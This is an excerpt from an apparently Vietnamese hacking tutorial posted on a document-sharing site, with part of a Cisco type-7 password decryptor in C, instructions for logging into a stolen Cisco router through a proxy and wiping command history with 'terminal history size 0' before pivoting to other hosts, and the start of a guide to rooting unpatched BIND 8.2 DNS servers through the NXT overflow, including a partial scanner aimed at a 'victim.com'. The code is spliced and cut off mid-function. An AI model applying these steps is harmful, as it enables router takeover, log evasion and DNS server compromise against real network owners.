Hacking Security Sites part 35 pdf

6 262 1
Hacking Security Sites part 35 pdf

Đang tải... (xem toàn văn)

Thông tin tài liệu

{ unsigned int seed, i, val = 0; if(strlen(enc_pw) & 1) return(-1); seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0'; if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1])) return(-1); for (i = 2 ; i <= strlen(enc_pw); i++) { if(i !=2 && !(i & 1)) { dec_pw[i / 2 - 2] = val ^ xlat[seed++]; val = 0; } val *= 16; if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) { val += enc_pw[i] - '0'; continue; } if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') { val += enc_pw[i] - 'A' + 10; continue; } if( if(cdecrypt(&line[pw_pos], passwd)) { fprintf(stderr, "Error.\n"); exit(1); } else { if(pw_pos == strlen(pw_str1)) fprintf(out, "%s", pw_str1); else fprintf(out, "%s", pw_str2); fprintf(out, "%s\n", passwd); } } } Nếu bạn không chạy Linux , mà chạy Windown chẳng han . Thì bạn lại phải cần 1 chương trình brute-force , nó sẽ cho phép ban chay John the Ripper hoặc Password- Cracker trên Windown . Và sau đó hãy kiên nhẫn chờ đợi . Một hệ thống lớn đang nằm trong tay bạn . IV Cách sử dụng Router Cisco Bạn đã có trong tay 1 password của hên thống Cisco , bây giờ hãy làm chủ cái công nghệ tuyệt vời này . Bạn hãy Connect tới hệ thống (Bạn vẫn còn nhớ IP củ a nó chứ) với password hợp pháp . Nhưng nếu không muốn bị log IP thì hãy thông qua 1 proxy server . Bạn đã đăng nhập được vào bên trong , Lúc này hệ thống sẽ ghi lại toàn bộ những hành động của bạn bên trong server (nó giống nhưcái History cua IE) . Bạn không muốn mình bị theo dõi như vậy thì hãy gõ lệnh sau : terminal history size 0 Bây giờ nó sẽ không nhớ bất kỳ cái gì về bạn nữa , chúng ta có thể yên tâm mà khai thác sử dung Rounter này . Bạn muốn cách sử dụng Rounter ? Hãy gõ " ? " , một loạt các danh sách lệnh của chương trinh Rounter Cisco hiện ra . Và bạn có thể sử dụng hầu h ết nó . Những chương trình vận chuyển Cisco thông thường cho telnet , như vậy bạn có thể dùng telnet kết nối với những hệ thống khác (Bạn thấy nó sớng không , Hack được 1 hệ thống ta có thể có quyền vào những hệ thống khác mà Cisco này đang làm việc) Bạn có thể sử dụng hệ thống Rounter để chặn đứng các gói dữ liệu được chuyền tới và chuyền đi thông qua hệ thống Cisco này . Hoặc b ạn có thể sao chép các dữ liệu các gói hàng , nhưng trong bài viết này tôi sẽ không đề cập đến vấn đề đó vì nó quá sức nguy hiểm V. Lời Kết Bạn đừng tức giận hay khóc khi mà không Hack được 1 hệ thống Cisco lần đầu tiên , và thậm chí cả sau này . Nó cần sự thực hành kiên nhẫn từ bạn chứ không như kiểu Hack server khác là 1 nhát được ngay . Hay tỉ mỉ trong từng bớc bạn sẽ thành công ! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~ Hack BIND 8.2/8.2.1 qua bug "NXT" Các máy chủ tên miền (DNS server) chạy BIND 8.2/8.2.1 không xử lí chính xác các record NXT. Điều này tạo điều kiện cho attacker có thể làm tràn bộ đệm của BIND và thi hành các mã lệnh độc đoán trên máy chủ tên miền mà cụ thể nhất là lấy root (theo CA- 99-14, ngày 10/11/1999) Dưới đây là cách để hack các máy chủ tên miền chạy BIND 8.2/8.2.1 gặp bug "nxt" nhưng chưa được patch Bước 1: scan các DNS server gặp bug "nxt" bằng CBIND (cảm ơn Nguyễn Xuân Bình nha) /* BIND NXT vulnerable SCANNER - CBIND */ #include <stdio.h>#include <stdlib.h>#include <unistd.h>#include <wait.h>#include <netdb.h>#include <string.h>#include <sys/types.h>#include <sys/wait.h>#include <sys/stat.h>#include <sys/socket.h>#include <netinet/in.h> /* DO NOT EDIT THIS LINE */ #define SCAN_EXE "./nmap -p 53 " /* EDIT: directory of NMAP */ #define SCAN_DIR "/home/lb0gspm/tmp/nmap/" /* EDIT: directory of CBIND and it's temporary files */ #define CBIND_DIR "/home/lb0gspm/tmp/cbind/" #define R1_DIR "/home/lb0gspm/tmp/cbind/result1.cbind" #define R2_DIR "/home/lb0gspm/tmp/cbind/result2.cbind" int Scan( char *ip ); char *GetSubnet( char *ip ); char *ChangeSubnet( char *ip, char *subnet ); char *itoa( int i ); int main( int argc, char *argv[] ) { struct in_addr addr; struct hostent *host_entry; unsigned short int option[3], i, wait_st; unsigned char *name; unsigned char *cmd; unsigned char *ip, *subnet, *ip_s; unsigned char *temp; FILE *fp; printf( "Check BIND v 2.00b \n" ); printf( "Bind NXT vulnerablity scanner\n\n" ); name = (char *)malloc( 200 ); ip = (char *)malloc( 16 ); ip_s = (char *)malloc( 16 ); subnet = (char *)malloc( 4 ); cmd = (char *)malloc( 50 ); if( argc == 1 ) { printf( "Options: \n" ); printf( " -s SUB-NET SCAN ( SLOW BUT HIGH PRECISE )\n" ); printf( " -f SUB-NET SCAN ( FAST BUT LOW PRECISE / NMAP REQUIRE )\n" ); printf( " -i PRINT INFOMATION\n\n" ); printf( "Examples: \n" ); printf( " cbind victim.com ( IT WILL SCAN IF TARGET IS VULNERABLE OR NOT )\n" ); printf( " cbind victim.com -s ( IT WILL SCAN ALL SUB-NETs IN DETAIL )\n" ); printf( " cbind -f victim.com ( IT WILL SCAN SUB-NETs LOW PRECISE )\n\n" ); exit(0); } else { option[0] = 0; option[1] = 0; option[2] = 0; for( i = 1; i < argc; i++ ) { if( strcmp( argv[i], "-s" ) == 0 ) { if( option[2] == 1 ) { printf( "Can not use options -s, -f at the same time.\n" ); exit(0); } if( option[0] == 1 ) { printf( "Can not use option -s with -i.\n" ); exit(0); } printf( "Sub-net( high precise ) scan mode ACTIVATED.\n" ); printf( "It can takes long.\n\n" ); option[1] = 1; continue; } if( strcmp( argv[i], "-f" ) == 0 ) { if( option[1] == 1 ) { printf( "Can not use options -s, -f at the same time.\n" ); exit(0); } if( option[0] == 1 ) { printf( "Can not use options -f with -i.\n" ); exit(0); } printf( "Sub-net( low precise ) scan mode ACTIVATED.\n" ); printf( "It require NMAP 2.07 or higher version.\n\n" ); option[2] = 1; continue; } if( strcmp( argv[i], "-i" ) == 0 ) { if( (option[1] == 1) || (option[2] == 1) ) { printf( "Can not use option -i with -s(or -f).\n" ); exit(0); } option[0] = 1; continue; } strcpy( name, argv[i] ); } } if( geteuid() != 0 ) { printf( "Error! You are not ROOT!\n" ); exit(0); } 

Ngày đăng: 01/07/2014, 17:20

Từ khóa liên quan

Tài liệu cùng người dùng

  • Đang cập nhật ...

Tài liệu liên quan